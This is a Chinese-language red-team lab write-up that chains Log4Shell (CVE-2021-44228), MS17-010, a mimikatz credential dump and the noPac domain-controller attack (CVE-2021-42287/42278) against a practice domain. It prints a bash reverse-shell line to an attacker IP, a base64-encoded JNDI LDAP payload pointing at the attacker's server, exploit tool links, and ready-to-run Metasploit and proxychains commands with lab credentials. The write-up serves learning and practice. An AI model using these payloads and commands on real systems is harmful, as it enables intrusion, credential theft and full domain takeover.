从外网 log4j2 RCE 再到内网组合拳漏洞 CVE-2021-42287、CVE-2021-42278 拿到 DC

网络拓扑

信息搜集

渗透测试第一步当然是信息搜集

拿到 IP192.168.81.151我们先使用nmap对他进行常规TCP端口的扫描

nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88,38080 192.168.81.151

发现开放了22,38080这两个端口

通过nmap我们可以得知这是一台Ubuntu，22是ssh，而38080这个端口是unknown的，我们尝试访问一下

于是尝试最近爆出的新漏洞 CVE-2021-44228 尝试看看能不能获取到 dnslog

发现存在 CVE-2021-44228漏洞，尝试去获取一个shell

CVE-2021-44228 利用

首先在我们的VPS kali(192.168.81.133) 开启一个LDAP：

git clone https://github.com/black9/Log4shell_JNDIExploit.git

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.81.133

然后在kali上nc监听9999端口：

我们使用TOMCATBYpass进行反弹shell

/bin/bash -i >& /dev/tcp/192.168.210.23/9999 0>&1 -反弹shell

反弹shell命令需要进行base64编码

BP抓包，改为post传参并且构造payload

payload=${jndi:ldap://192.168.81.133:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgxLjEzMy85OTk5IDA+JjE=}

最后使用EXP成功反弹shell，要对base64编码进行两次url编码才能执行

发现当前拿到的shell是一个docker容器

想办法逃逸也失败了，最后在/root/目录下找到了flag文件：

flag{redteam.lab-1}

Congratulations, you got this: saul Saul123

得到了一个flag，还有一个类似于账号密码的东西

在信息收集中nmap扫到目标主机开放22ssh服务，因此思考可能是ssh的账号密码

内网信息搜集

通过上节得到的账号和密码登陆到了Ubuntu系统

我们可以看到当前机器拥有两块网卡，一块ens33用于链接外网，一块ens38用于内网通信

在实战的内网渗透中：如果是在 linux 环境下的内网渗透尽量形成全部 bash 和 python 化，因为 Linux 都完全自带，而在 windows 下的内网渗透则尽量全部形成 powershell，bat、vbs 化，尽量不要过于依赖外部工具。

所以我们使用for循环ping一下ens38的c段网络

for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i Find the target; fi; done

发现内网还有一台机器10.0.1.7存在

或者使用 scan info 工具进行内网信息收集

kali中使用python快速搭建httpd

靶机下载工具并赋予权限

进行内网信息收集

发现10.0.1.7存活并存在MS17-010

随后为了方便，我选择用 frp 把当前机器的流量代理出来：

配置frps.ini

配置frpc.ini

然后使用 Metasploit 设置 Socks5 对内网进行深度信息搜集；

setg Proxies socks5:192.168.81.133:8888
setg ReverseAllowProxy true

使用 smb 版本探测模块对目标进行扫描：

use auxiliary/scanner/smb/smb_version

发现目标10.0.1.7版本是windows7，并且存在域REDTEAM

既然是windows7，那么就可能存在MS17-010漏洞

MS17-010利用

通过上节，我们知道了10.0.1.7是win7，接下来进行探测

通过探测得知这台机器是存在ms17-010漏洞的

由于目标是内网不一定出网，故而tcp反射连接不能使用 设置为payload正向bind_tcp

直接拿到win7权限，然后加载mimikataz把密码抓出来

Username   Domain   Password
 root     REDTEAM   Red12345

meterpreter > load mimikatz  加载工具

meterpreter > creds_all      列出凭证  
注意命令是从内存中抓取密码，靶场原始状态为暂停恢复即可，如果重启过需要登录一次win7

这个时候就得到了一个域用户的账号了。

内网利器 CVE-2021-42287、CVE-2021-42278

通过对当前内网的信息搜集之后发现，win7还有一块内网的网卡

且定位到域控到域控 IP 为 10.0.0.12

由于最近爆出了两个域内漏洞：CVE-2021-42287、CVE-2021-42278，直接尝试利用一下。

具体原理是：假如域内有一台域控名为 DC（域控对应的机器用户为 DC），此时攻击者利用漏洞CVE-2021-42287创建一个机器用户saulGoodman，再把机器用户 saulGoodman的sAMAccountName改成DC。然后利用DC去申请一个TGT票据。再把DC的sAMAccountName改为sAMAccountName。这个时候 KDC 就会判断域内没有 DC 和这个用户，自动去搜索 DC（DC是域内已经的域控DC 的 sAMAccountName），攻击者利用刚刚申请的 TGT进行 S4U2self，模拟域内的域管去请求域控 DC 的 ST 票据，最终获得域控制器DC的权限。

于是直接使用MSF添加一个socks5

添加路由

run autoroute -s 10.0.0.7/24

然后我们把本地的代理加上就行了

利用工具下载地址

https://github.com/WazeHell/sam-the-admin

https://github.com/Ridter/noPac

https://github.com/waterrr/noPac

然后利用脚本即可

proxychains python3 sam_the_admin.py "redteam.lab/root:Red12345" -dc-ip 10.0.0.12 -shell
proxychains python noPac.py redteam.lab/root:'Red12345' -dc-ip 10.0.0.12 -shell --impersonate administrator -use-ldap
proxychains python3 exp.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell

最后也是拿到了最终的 Flag。